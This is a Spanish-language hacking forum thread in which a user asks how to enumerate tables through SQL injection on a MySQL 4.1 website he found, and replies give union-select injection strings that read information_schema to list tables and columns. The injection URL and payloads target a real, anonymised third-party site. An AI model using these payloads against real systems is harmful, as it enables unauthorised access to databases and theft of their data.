elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Obtener tablas con SQL Injection (mysql 4)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Obtener tablas con SQL Injection (mysql 4)  (Leído 15,746 veces)
Leber


Desconectado Desconectado

Mensajes: 338


"Fracta, non verba"


Ver Perfil WWW
Obtener tablas con SQL Injection (mysql 4)
« en: 26 Mayo 2008, 16:23 pm »

Buenas, queria saber a ver si alguien podia orientarme un poco. Llevo varias dias practicando con una bd que me cree en casa, y a ver como podia sacar datos y demas. En la v. >=5 que es la que tengo, es sencillo si tienes en cuenta informacion_schema o mysql. Pues bien, hoy me tope con una pagina, tal que asi:

http://pagina_anonima.com/var.php?id=-1%20union%20all%20select%201,2,3,4,5,6,7,8%20from%20user

Y tal tabla existe, pero no puedo averiguar su contenido, he probado con users, user, username, userid, password etc y nada. La version es  4.1.22-standard

A ver si alguien puede orientarme un poco, por donde deberia de ir y seguir ratro etc.

PD: Que conste que no es por hacer ningun mal, es simple curiosidad.

Gracias de antemano
« Última modificación: 12 Agosto 2008, 16:46 pm por sirdarckcat » En línea

"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Cable en SQL Injection
« Respuesta #1 en: 12 Agosto 2008, 16:11 pm »

:http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/
En línea

Monaco

Desconectado Desconectado

Mensajes: 11


Ver Perfil
Re: Obtener tablas con SQL Injection (mysql 4)
« Respuesta #2 en: 7 Septiembre 2008, 00:31 am »


para averiguar nombre la tabla:
+union+all+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+where+table_schema+=+database()

para averiguar columnas sabiendo el nombre de la tabla:
+union+all+select+1,2,column_name,4,5,6,7,8+from+information_schema.columns+where+table_name+=+char(NOMBRE DE TABLA)

Si los valores no salen a la primera tendras que ir delimitando un poco la busqueda.


Espero que haya servido un poco...


Saludos
En línea

tomrian

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Obtener tablas con SQL Injection (mysql 4)
« Respuesta #3 en: 12 Septiembre 2009, 11:38 am »

La base de datos information_schema aparece recién en la version 5 de MySQL. Desgraciadamente (para nosotros :P), en versiones anteriores, de la 4 para atras, no se cuenta con ninguna tabla por el estilo y se tiene que recurrir a la adivinación.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines